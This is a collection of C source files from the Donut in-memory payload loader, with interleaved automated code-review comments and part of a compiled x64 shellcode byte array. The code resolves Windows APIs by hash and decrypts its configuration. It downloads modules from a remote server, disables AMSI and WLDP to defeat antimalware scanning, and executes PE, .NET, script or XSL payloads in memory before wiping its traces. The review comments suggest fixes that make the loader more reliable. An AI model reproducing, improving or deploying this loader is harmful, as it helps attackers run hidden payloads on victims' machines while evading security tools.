51 xsl_str = (PWCHAR)inst->api.VirtualAlloc(
52 NULL,
53 (inst->mod_len + 1) * sizeof(WCHAR),
54 MEM_COMMIT | MEM_RESERVE,
55 PAGE_READWRITE);
56
57 if(xsl_str != NULL) {
58 // 2. Convert string to unicode.
59 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
60 -1, xsl_str, mod->len * sizeof(WCHAR));
61
62 // 3. Initialize COM
63 DPRINT("CoInitializeEx");
64 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
65
66 if(hr == S_OK) {
67 // 4. Instantiate XMLDOMDocument object
68 DPRINT("CoCreateInstance");
69 hr = inst->api.CoCreateInstance(
70 &inst->xCLSID_DOMDocument30,
71 NULL, CLSCTX_INPROC_SERVER,
72 &inst->xIID_IXMLDOMDocument,
73 (void**)&pDoc);
74
75 if(hr == S_OK) {
76 // 5. load XSL file
77 DPRINT("IXMLDOMDocument::loadXML");
78 hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
79 DPRINT("HRESULT: %08lx loaded : %s",
80 hr, loaded ? "TRUE" : "FALSE");
81
82 if(hr == S_OK && loaded) {
83 // 6. query node interface
84 DPRINT("IXMLDOMDocument::QueryInterface");
85 hr = pDoc->lpVtbl->QueryInterface(
86 pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);
87
88 if(hr == S_OK) {
89 DPRINT("HRESULT: %08lx", hr);
90 // 7. execute script
91 DPRINT("IXMLDOMDocument::transformNode");
92 hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
93 DPRINT("HRESULT: %08lx", hr);
94 pNode->lpVtbl->Release(pNode);
95 }
96 }
97 pDoc->lpVtbl->Release(pDoc);
98 }
99 DPRINT("CoUninitialize");
100 inst->api.CoUninitialize();
101 }
102 DPRINT("Erasing XSL from memory.");
103 Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR));
104
105 DPRINT("VirtualFree()");
106 inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT);
107 }
108 }
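Review bot: The last argument of MultiByteToWideChar at lines 59–60 is a count of WCHARs, not bytes, so `mod->len * sizeof(WCHAR)` declares a capacity twice `mod->len` while the buffer allocated at 51–55 holds `inst->mod_len + 1` WCHARs; the capacity passed should be the number actually allocated, `inst->mod_len + 1`, and the return value (0 on failure) should be checked before `xsl_str` is handed to loadXML. The `-1` source length also relies on `mod->data` being NUL-terminated, which nothing in this file guarantees; if `mod->len` is the byte length of the data, passing it instead bounds the read, and the zero-filled VirtualAlloc'd buffer still terminates the result. Separately, the BSTR that transformNode writes into `res` at line 92 is never released; add `if(hr == S_OK) inst->api.SysFreeString(res);` after the call. In DEBUG builds the DPRINT at 79–80 reads `loaded` even when loadXML failed and left it unset, so declare it as `VARIANT_BOOL loaded = VARIANT_FALSE;`.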
0 ThreadProc
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "payload.h"
32
33 DWORD ThreadProc(LPVOID lpParameter) {
34 ULONG i, ofs;
35 ULONG64 sig;
36 PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter;
37 DONUT_ASSEMBLY assembly;
38 PDONUT_MODULE mod;
39 VirtualAlloc_t _VirtualAlloc;
40 VirtualFree_t _VirtualFree;
41 LPVOID pv;
42 ULONG64 hash;
43 BOOL disabled;
44
45 DPRINT("Maru IV : %" PRIX64, inst->iv);
46
47 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
48 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
49 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
50
51 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
52 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
53 _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
54
55 if(_VirtualAlloc == NULL || _VirtualFree == NULL) {
56 DPRINT("FAILED!.");
57 return -1;
58 }
59
60 DPRINT("VirtualAlloc : %p VirtualFree : %p",
61 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
62
63 DPRINT("Allocating %i bytes of RW memory", inst->len);
64 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
65
66 if(pv == NULL) {
67 DPRINT("Memory allocation failed...");
68 return -1;
69 }
70 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
71 Memcpy(pv, lpParameter, inst->len);
72 inst = (PDONUT_INSTANCE)pv;
73
74 DPRINT("Zero initializing PDONUT_ASSEMBLY");
75 Memset(&assembly, 0, sizeof(assembly));
76
77 #if !defined(NOCRYPTO)
78 PBYTE inst_data;
79 // load pointer to data just past len + key
80 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
81
82 DPRINT("Decrypting %li bytes of instance", inst->len);
83
84 donut_decrypt(inst->key.mk,
85 inst->key.ctr,
86 inst_data,
87 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
88
89 DPRINT("Generating hash to verify decryption");
90 ULONG64 mac = maru(inst->sig, inst->iv);
91 DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac);
92
93 if(mac != inst->mac) {
94 DPRINT("Decryption of instance failed");
95 goto erase_memory;
96 }
97 #endif
98 DPRINT("Resolving LoadLibraryA");
99
100 inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
101 if(inst->api.addr[0] == NULL) return -1;
102
103 for(i=0; i<inst->dll_cnt; i++) {
104 DPRINT("Loading %s ...", inst->dll_name[i]);
105 inst->api.LoadLibraryA(inst->dll_name[i]);
106 }
107
108 DPRINT("Resolving %i API", inst->api_cnt);
109
110 for(i=1; i<inst->api_cnt; i++) {
111 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
112
113 inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
114
115 if(inst->api.addr[i] == NULL) {
116 DPRINT("Failed to resolve API");
117 goto erase_memory;
118 }
119 }
120
121 if(inst->type == DONUT_INSTANCE_URL) {
122 DPRINT("Instance is URL");
123 if(!DownloadModule(inst)) goto erase_memory;
124 }
125
126 if(inst->type == DONUT_INSTANCE_PIC) {
127 DPRINT("Using module embedded in instance");
128 mod = (PDONUT_MODULE)&inst->module.x;
129 } else {
130 DPRINT("Loading module from allocated memory");
131 mod = inst->module.p;
132 }
133
134 // try bypassing AMSI and WLDP?
135 if(inst->bypass != DONUT_BYPASS_SKIP) {
136 // Try to disable AMSI
137 disabled = DisableAMSI(inst);
138 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
139 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
140 goto erase_memory;
141
142 // Try to disable WLDP
143 disabled = DisableWLDP(inst);
144 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
145 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
146 goto erase_memory;
147 }
148
149 // unmanaged EXE/DLL?
150 if(mod->type == DONUT_MODULE_DLL ||
151 mod->type == DONUT_MODULE_EXE) {
152 RunPE(inst);
153 } else
154 // .NET EXE/DLL?
155 if(mod->type == DONUT_MODULE_NET_DLL ||
156 mod->type == DONUT_MODULE_NET_EXE)
157 {
158 if(LoadAssembly(inst, &assembly)) {
159 RunAssembly(inst, &assembly);
160 }
161 FreeAssembly(inst, &assembly);
162 } else
163 // vbs or js?
164 if(mod->type == DONUT_MODULE_VBS ||
165 mod->type == DONUT_MODULE_JS)
166 {
167 RunScript(inst);
168 } else
169 // xsl?
170 if(mod->type == DONUT_MODULE_XSL) {
171 RunXSL(inst);
172 }
173
174 erase_memory:
175 // if module was downloaded
176 if(inst->type == DONUT_INSTANCE_URL) {
177 if(inst->module.p != NULL) {
178 // overwrite memory with zeros
179 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
180
181 // free memory
182 inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
183 inst->module.p = NULL;
184 }
185 }
186
187 DPRINT("Erasing RW memory for instance");
188 Memset(inst, 0, inst->len);
189
190 DPRINT("Releasing RW memory for instance");
191 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
192
193 return 0;
194 }
195
196 #include "http_client.c" // For downloading module
197
198 #include "inmem_dotnet.c" // .NET assemblies
199 #include "inmem_pe.c" // Unmanaged PE/DLL files
200 #include "inmem_xsl.c" // XSL files
201 #include "inmem_script.c" // VBS/JS files
202
203 #include "peb.c" // resolve functions in export table
204
205 #include "bypass.c" // Bypass AMSI and WLDP
206 #include "getpc.c" // code stub to return program counter (always at the end!)
207
208 // the following code is *only* for development purposes
209 // given an instance file, it will run as if running on a target system
210 // attach a debugger to host process
211 #ifdef DEBUG
212
213 #include <stdio.h>
214 #include <string.h>
215 #include <stdlib.h>
216 #include <sys/stat.h>
217
218 int main(int argc, char *argv[]) {
219 FILE *fd;
220 struct stat fs;
221 PDONUT_INSTANCE inst;
222 DWORD old;
223
224 if(argc != 2) {
225 printf(" [ usage: payload <instance>\n");
226 return 0;
227 }
228 // get size of instance
229 if(stat(argv[1], &fs) != 0) {
230 printf(" [ unable to obtain size of instance.\n");
231 return 0;
232 }
233
234 // zero size?
235 if(fs.st_size == 0) {
236 printf(" [ invalid instance.\n");
237 return 0;
238 }
239
240 // try open for reading
241 fd = fopen(argv[1], "rb");
242 if(fd == NULL) {
243 printf(" [ unable to open %s.\n", argv[1]);
244 return 0;
245 }
246
247 // allocate memory
248 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
249
250 if(inst != NULL) {
251 fread(inst, 1, fs.st_size, fd);
252
253 // change protection to PAGE_EXECUTE_READ
254 if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
255 printf("Running...");
256
257 // run payload with instance
258 ThreadProc(inst);
259 }
260 // deallocate
261 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
262 }
263 fclose(fd);
264 return 0;
265 }
266 #endif
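Review bot: The cleanup at erase_memory (lines 174–185) frees a downloaded module through `inst->api.VirtualFree`, but that slot is only populated by the resolution loop at 110–119, so a jump from the MAC check at 93–96 or from a failed resolution at 115–118 reaches a function pointer that has not been resolved yet — and after a failed decrypt `inst->type` and `inst->module.p` are unverified bytes, so the URL branch may zero and free an arbitrary address. Use the already-resolved local there, `_VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);`, and have the MAC-failure path jump to a label placed just before line 187 so it only wipes and releases the instance copy (its `len` field sits before `api_cnt` and is not encrypted, per the comment at 79). Line 101 returns without any of that cleanup, leaving the decrypted RW copy of the instance mapped; it should read `if(inst->api.addr[0] == NULL) goto erase_memory;`. The DPRINT at line 52 also says VirtualAlloc while resolving VirtualFree.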
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PAYLOAD_H
32 #define PAYLOAD_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45
46 #pragma comment(lib, "wininet.lib")
47 #pragma comment(lib, "advapi32.lib")
48 #pragma comment(lib, "crypt32.lib")
49
50 #if defined(DEBUG)
51 #include <stdio.h>
52 #include <string.h>
53
54 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
55
56 #define DPRINT(...) { \
57 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
58 fprintf(stderr, __VA_ARGS__); \
59 }
60 #else
61 #define DPRINT(...) // Don't do anything in release builds
62 #endif
63
64 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
65 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
66 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
67
68 // Relative Virtual Address to Virtual Address
69 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
70
71 #if defined(_M_IX86) || defined(__i386__)
72 // return pointer to code in memory
73 char *get_pc(void);
74
75 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
76 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
77 #else
78 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
79 #endif
80
81 void *Memset(void *ptr, int value, size_t num);
82 void *Memcpy(void *destination, const void *source, size_t num);
83 int Memcmp(const void *ptr1, const void *ptr2, size_t num);
84
85 #if !defined(_MSC_VER)
86 #define memcmp(x,y,z) Memcmp(x,y,z)
87 #endif
88
89 #include "peb.h" // Process Environment Block
90 #include "winapi.h" // Prototypes
91 #include "clr.h" // Common Language Runtime Interface
92
93 #include "donut.h"
94
95 #include "amsi.h" // Anti-malware Scan Interface
96 #include "activescript.h" // Interfaces for executing VBS/JS files
97 #include "wscript.h" // Interfaces to support WScript object
98
99 typedef struct {
100 IActiveScriptSite site;
101 IActiveScriptSiteWindow siteWnd;
102 IHost wscript;
103 HANDLE hEvent;
104 PDONUT_INSTANCE inst; //
105 } MyIActiveScriptSite;
106
107 // internal structure
108 typedef struct _DONUT_ASSEMBLY {
109 ICLRMetaHost *icmh;
110 ICLRRuntimeInfo *icri;
111 ICorRuntimeHost *icrh;
112 IUnknown *iu;
113 AppDomain *ad;
114 Assembly *as;
115 Type *type;
116 MethodInfo *mi;
117 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
118
119 // Downloads a module from remote HTTP server into memory
120 BOOL DownloadModule(PDONUT_INSTANCE);
121
122 // .NET DLL/EXE
123 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
124 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
125 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
126
127 // Extensible Stylesheet Language Transformations
128 VOID RunXSL(PDONUT_INSTANCE);
129
130 // In-Memory execution of native DLL
131 VOID RunPE(PDONUT_INSTANCE);
132
133 // VBS / JS files
134 VOID RunScript(PDONUT_INSTANCE);
135
136 // Disables Antimalware Scan Interface
137 BOOL DisableAMSI(PDONUT_INSTANCE);
138
139 // Disables Windows Lockdown Policy
140 BOOL DisableWLDP(PDONUT_INSTANCE);
141
142 LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
143
144 #endif
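Review bot: The DEBUG definition of DPRINT at lines 56–59 expands to a bare `{ ... }` block, so it is not a single statement: `if (x) DPRINT("..."); else ...` fails to compile in debug builds because the `;` after the block terminates the `if`, while the release variant at 61 expands to nothing and leaves a stray `;`. Wrap the debug body as `#define DPRINT(...) do { \` … `} while (0)` and define the release variant as `#define DPRINT(...) ((void)0)` so both forms behave like one statement wherever the loader uses them. The `inst` member of MyIActiveScriptSite at line 104 carries an empty trailing `//`; either drop it or say what the field is for.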
0
1 unsigned char PAYLOAD_EXE_X64[] = {
2 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48,
3 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48,
4 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48,
5 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48,
6 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34,
7 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
8 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
9 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89,
10 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45,
11 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0,
12 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00,
13 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
14 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00,
15 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8,
16 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff,
17 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89,
18 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10,
19 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8,
20 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41,
21 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
22 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05,
23 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8,
24 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48,
25 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48,
26 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
27 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45,
28 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a,
29 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00,
30 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18,
31 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00,
32 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45,
33 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8,
34 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
35 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48,
36 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
37 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
38 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b,
39 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00,
40 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08,
41 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
42 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7,
43 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45,
44 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
45 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8,
46 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48,
47 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2,
48 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
49 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f,
50 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
51 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d,
52 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8,
53 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10,
54 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48,
55 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
56 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
57 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
58 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
59 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50,
60 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00,
61 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45,
62 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
63 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
64 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75,
65 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83,
66 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
67 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b,
68 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89,
69 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48,
70 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b,
71 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95,
72 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
73 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70,
74 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c,
75 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b,
76 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a,
77 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48,
78 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b,
79 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26,
80 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48,
81 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb,
82 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb,
83 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00,
84 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80,
85 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45,
